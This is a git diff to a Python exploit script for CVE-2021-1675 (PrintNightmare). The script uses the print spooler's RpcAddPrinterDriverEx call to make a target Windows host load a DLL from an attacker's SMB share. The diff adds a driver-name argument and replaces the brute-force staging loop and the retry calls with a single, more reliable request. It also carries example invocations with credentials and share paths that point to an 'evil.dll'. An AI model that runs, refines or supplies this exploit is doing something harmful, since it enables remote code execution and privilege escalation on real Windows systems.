diff --git a/CVE-2021-1675.py b/CVE-2021-1675.py index fda7a8b..bf5d8fb 100644 --- a/CVE-2021-1675.py +++ b/CVE-2021-1675.py @@ -66,13 +66,13 @@ def getDrivers(dce, handle=NULL): return blob -def main(dce, pDriverPath, share, handle=NULL): +def main(dce, pDriverPath, driverName, share, handle=NULL): #build DRIVER_CONTAINER package container_info = rprn.DRIVER_CONTAINER() container_info['Level'] = 2 container_info['DriverInfo']['tag'] = 2 container_info['DriverInfo']['Level2']['cVersion'] = 3 - container_info['DriverInfo']['Level2']['pName'] = "1234\x00" + container_info['DriverInfo']['Level2']['pName'] = "{0}0\x00".format(driverName) container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00" container_info['DriverInfo']['Level2']['pDriverPath'] = pDriverPath + '\x00' container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share) @@ -84,18 +84,15 @@ def main(dce, pDriverPath, share, handle=NULL): resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) print("[*] Stage0: {0}".format(resp['ErrorCode'])) - container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00" - for i in range(1, 30): - try: - container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename) - resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) - print("[*] Stage{0}: {1}".format(i, resp['ErrorCode'])) - if (resp['ErrorCode'] == 0): - print("[+] Exploit Completed") - sys.exit() - except Exception as e: - #print(e) - pass + # Just ask for a new driver with already installed files + container_info['DriverInfo']['Level2']['pName'] = "{0}1\x00".format(driverName) + container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename) + flags = rprn.APD_COPY_NEW_FILES | 0x10 | 0x8000 + resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) + + print("[*] Stage1: {0}".format(resp['ErrorCode'])) + if (resp['ErrorCode'] == 0): + print("[+] Exploit Completed") if __name__ == '__main__': @@ -105,6 +102,7 @@ Example; ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL' """) parser.add_argument('target', action='store', help='[[domain/]username[:password]@]') + parser.add_argument('driverName', action='store', help='name of driver [need to be unique on target]') parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'') parser.add_argument('pDriverPath', action='store', help='Driver path. Example \'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\'', nargs="?") group = parser.add_argument_group('authentication') @@ -170,11 +168,4 @@ Example; print("[+] pDriverPath Found {0}".format(pDriverPath)) print("[*] Executing {0}".format(options.share)) - - #re-run if stage0/stageX fails - print("[*] Try 1...") - main(dce, pDriverPath, options.share) - print("[*] Try 2...") - main(dce, pDriverPath,options.share) - print("[*] Try 3...") - main(dce, pDriverPath,options.share) + main(dce, pDriverPath, options.driverName, options.share)